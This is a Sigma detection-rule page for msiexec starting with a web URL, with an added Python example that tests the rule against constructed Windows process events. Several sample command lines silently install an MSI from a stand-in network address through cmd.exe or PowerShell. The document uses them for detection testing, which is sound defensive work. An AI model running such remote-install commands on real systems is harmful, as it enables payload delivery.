MsiExec Web Install
Detects suspicious msiexec process starts with a web address passed as a parameter
Sigma rule
title: MsiExec Web Install
id: f7b5f842-a6af-4da5-9e95-e32478f3cd2f
related:
    - id: 8150732a-0c9d-4a99-82b9-9efb9b90c40c
      type: similar
status: test
description: Detects suspicious msiexec process starts with web addresses as parameter
references:
    - https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/
author: Florian Roth (Nextron Systems)
date: 2018/02/09
modified: 2022/01/07
tags:
    - attack.defense_evasion
    - attack.t1218.007
    - attack.command_and_control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - ' msiexec'
            - '://'
    condition: selection
falsepositives:
    - False positives depend on scripts and administrative tools used in the monitored environment
level: medium
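The selection above is a plain substring test on the CommandLine field: both literals must occur, and Sigma string matching is case-insensitive by default. The following is an added example (not part of the rule or the SigmaHQ project) that transcribes that selection into Python and runs it over a handful of constructed process_creation events, so you can see which command-line shapes the rule does and does not catch. The events, the 192.0.2.0/24 addresses and the package name are made up for illustration.

```python
"""Apply the 'MsiExec Web Install' selection to constructed sample events."""
from typing import Dict, Iterable, List

# Transcribed from the rule:
#   CommandLine|contains|all: [' msiexec', '://']
# Sigma 'contains' is case-insensitive unless a modifier says otherwise.
CONTAINS_ALL = (" msiexec", "://")


def matches_selection(command_line: str) -> bool:
    """True when every literal in CONTAINS_ALL occurs in command_line (case-insensitive)."""
    haystack = command_line.lower()
    return all(needle.lower() in haystack for needle in CONTAINS_ALL)


def run_rule(events: Iterable[Dict[str, object]]) -> List[Dict[str, object]]:
    """Return the process_creation events the rule would alert on.

    Only CommandLine is inspected; the rule places no constraint on Image,
    so a cmd.exe or powershell.exe event whose command line embeds
    ' msiexec' and '://' matches just like a direct msiexec start.
    """
    return [e for e in events if matches_selection(str(e.get("CommandLine", "")))]


# Constructed sample events (not real telemetry); 192.0.2.10 is a documentation address.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    # 1: shell wrapper, URL install -> ' msiexec' and '://' both present
    {"id": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c msiexec /q /i http://192.0.2.10/pkg.msi"},
    # 2: full-path invocation -> the literal before 'msiexec' is a backslash, not a space
    {"id": 2, "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'"C:\Windows\System32\msiexec.exe" /quiet /i https://192.0.2.10/pkg.msi'},
    # 3: local package, no URL -> '://' absent
    {"id": 3, "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec /i C:\Temp\setup.msi /qn"},
    # 4: PowerShell wrapper with upper-case MSIEXEC -> matches because matching is case-insensitive
    {"id": 4, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -c \"Start-Process MSIEXEC -ArgumentList '/q /i http://192.0.2.10/pkg.msi'\""},
    # 5: bare 'msiexec' at the start of the field -> no leading space, so ' msiexec' is absent
    {"id": 5, "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec /q /i http://192.0.2.10/pkg.msi"},
]


def matched_ids(events: Iterable[Dict[str, object]] = SAMPLE_EVENTS) -> List[object]:
    """Ids of the sample events the rule fires on."""
    return [e["id"] for e in run_rule(events)]


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        verdict = "ALERT " if matches_selection(str(event["CommandLine"])) else "quiet "
        print(verdict, event["id"], event["CommandLine"])
```

Events 2 and 5 are the ones worth a second look when tuning: the rule's first literal is the six characters ' msiexec' with a leading space, so whether a given telemetry source records a space in front of the program name (or records the full path, as in event 2) decides the hit. If your environment logs the full path, pair this selection with an Image-based condition rather than relying on the leading space.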
References
- https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/
Related rules
- Suspicious Registry Key Added: LanmanServer Parameters
- Suspicious Registry Key Set (MaxMpxCt)
- Suspicious Registry Modification of MaxMpxCt Parameters
- PowerShell DownloadFile
- RDP Port Forwarding Rule Added Via Netsh.EXE